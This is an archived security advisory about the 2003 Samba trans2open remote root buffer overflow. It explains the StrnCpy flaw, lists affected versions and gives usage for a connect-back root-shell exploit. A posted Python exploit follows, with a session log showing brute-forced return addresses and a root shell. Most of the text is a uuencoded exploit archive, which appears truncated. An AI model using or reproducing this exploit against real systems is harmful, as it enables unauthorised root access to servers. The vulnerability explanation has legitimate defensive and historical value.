7th Apr 2003 [SBWID-6117]
COMMAND
Samba remote buffer overflow
SYSTEMS AFFECTED
version 2.2 prior to 2.2.8a
version 2.0 prior or equal to 2.0.10
version Samba-TNG prior to 0.3.2
PROBLEM
A remote root buffer overflow has been found by Digital Defence Inc,
while sniffing strange traffic. As described in Digital Defense Inc.
Security Advisory DDI-1013 [http://www.digitaldefense.net/]:
An anonymous user can gain remote root access due to a buffer overflow
caused by a StrnCpy() into a char array (fname) using a non-constant
length (namelen).
StrnCpy(fname,pname,namelen); /* Line 252 of smbd/trans2.c */
In the call_trans2open function in trans2.c, the Samba StrnCpy function
copies pname into fname using namelen. The variable namelen is assigned
the value of strlen(pname)+1, which causes the overflow.
The variable 'fname' is a _typedef_ pstring, which is a char with a
size of 1024. If pname is greater than 1024, you can overwrite almost
anything you want past the 1024th byte that fits inside of
sizeof(pname), or the value returned by SVAL(inbuf,smbd_tpscnt) in
function reply_trans2(), which should be around 2000 bytes.
Forced Release
==============
This vulnerability is being actively exploited in the wild. Digital
Defense, Inc. discovered this bug by analyzing a packet capture of an
attack against a host running Samba 2.2.8. The attack captured was
performed on April 1st, 2003. Samba users are urged to check their
Samba servers for signs of compromise. Samba and Digital Defense, Inc.
decided to release their advisories before all vendors had a chance to
update their packages due to this vulnerability being actively
exploited.
Exploit
=======
Due to explicit non-copy notice, Digital Defense exploit is not
attached here. (see below for an other one)
From advisory:
An exploit named trans2root.pl has been posted on the Digital Defense,
Inc. website. A quick udp based based scanner named nmbping.pl has also
been posted to assist you in identifying Samba servers on your network.
Both are available for download from the following URL:
http://www.digitaldefense.net/labs/securitytools.html
This exploit works against all distributions listed in the testing
environment section. Usage is as follows:
trans2root.pl <options> -t <target type> -H <your ip> -h <target ip>
This exploit should work against all x86 Linux, Solaris, and FreeBSD
hosts running the 2.2.x branch of Samba. Hosts with a non-executable
stack are not vulnerable to this particular exploit. The exploit will
cause the target host to connect back to the host running the exploit
and spawn a root shell on the defined port (default is 1981).
The scanner is very easy to use, and should detect and identify Samba
and Windows SMB services. Usage is as follows:
nmbping.pl <network/cidr>
Update 10 apr.
==============
noir sin [noir(at)olympos(dot)org] posted following exploit:
0day is fragile! one day it's your precious, next day its worthless ...
anyways i put together this SAMBAExploit class in python which might be
interesting for folks since it's reusable in many other stuff ...
python cause; write once a heap, stack or fmt string exploit class and
the rest is just to "cp old_exp.py new_exp.py; vi new_exp.py"
exploit bruteforces all possible stack range and dups the already
connected socket for spawning the shell
greets to: Michael Teo for pysmb, lsd-pl for linux/findsck shellcode
- noir
noir@juneof44:/tmp/samba_exp2 > python samba_exp.py 172.17.1.132
[*] brute forcing well known addr range ... [*]
trying; retaddr: 0xbffed404
trying; retaddr: 0xbffed504
trying; retaddr: 0xbffed604
trying; retaddr: 0xbffed704
Linux localhost 2.4.9-e.3 #1 Fri May 3 17:02:43 EDT 2002 i686 unknown
cat /etc/redhat-rel*
Red Hat Linux Advanced Server release 2.1AS (Pensacola)
id
uid=0(root) gid=0(root) groups=99(nobody)
exit
*** Connection closed by remote host ***
Exploit code
=============
begin 644 trans2open.tgz
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
M0Z@U-[DG)H9KZS&G7)>TC^L)C'JK#KM*\JPNB&Y)=5PV$O328^+ATL5Z>
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
